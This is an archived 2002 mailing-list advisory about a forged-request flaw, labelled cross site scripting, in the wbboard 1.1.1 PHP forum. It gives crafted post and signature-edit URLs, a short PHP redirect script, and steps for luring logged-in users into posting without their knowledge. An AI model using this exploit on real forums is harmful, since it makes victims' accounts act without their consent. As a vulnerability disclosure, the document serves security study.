wbboard 1.1.1 Cross Site Scripting Vulnerability - ------------------------- Affected program : wbboard 1.1.1 is a phpBB-like PHP forum Vendor : http://www.woltlab.de/ Vulnerability-Class : Cross Site Scripting (CSS) OS specific : No Problem-Type : Joke severity : No risk SUMMARY 1.WBBoard allowed to post messages like this: http://localhost/wbboard/reply.php?threadid=7&boardid=58&action=send&subject=check%20this%20out&message=test[IMG]http://localhost/~seazon/art/eros/236.jpg[/IMG]&signature=1 2. allowed to edit signature like this: http://localhost/wbboard/profile.php?mode=editsignature&send=1$preview=0&message=Take%20a%20deep%20breath,%20relax%20[IMG]http://localhost/~seazon/art/eros/236.jpg[/IMG] IMPACT User clicked on this link force posted your message in forum :) EXPLOIT 1. Create a script exploit.php exploit.php // with php U can dynamicaly redirect to the same treads & boardid (parsing $HTTP_REFERER) <?php header ("Location: http://localhost/wbboard/reply.php?threadid=7&boardid=58&action=send&subject=check%20this%20out&message=test[IMG]http://localhost/~seazon/art/eros/236.jpg[/IMG]&signature=1"); /* Redirect browser*/ ?> 2.Register in forum 3.Send a message like this "Hey, I know how to exploit this forum [URL]http://host.com/exploit.php[/URL]" SOLUTION I dont think what it is necessary. P.S. : I think what all main forums is exploitable for this way. For phpBB you must use HTTP POST method
This archive was generated by hypermail 2b30 : Mon Apr 15 2002 - 17:41:21 PDT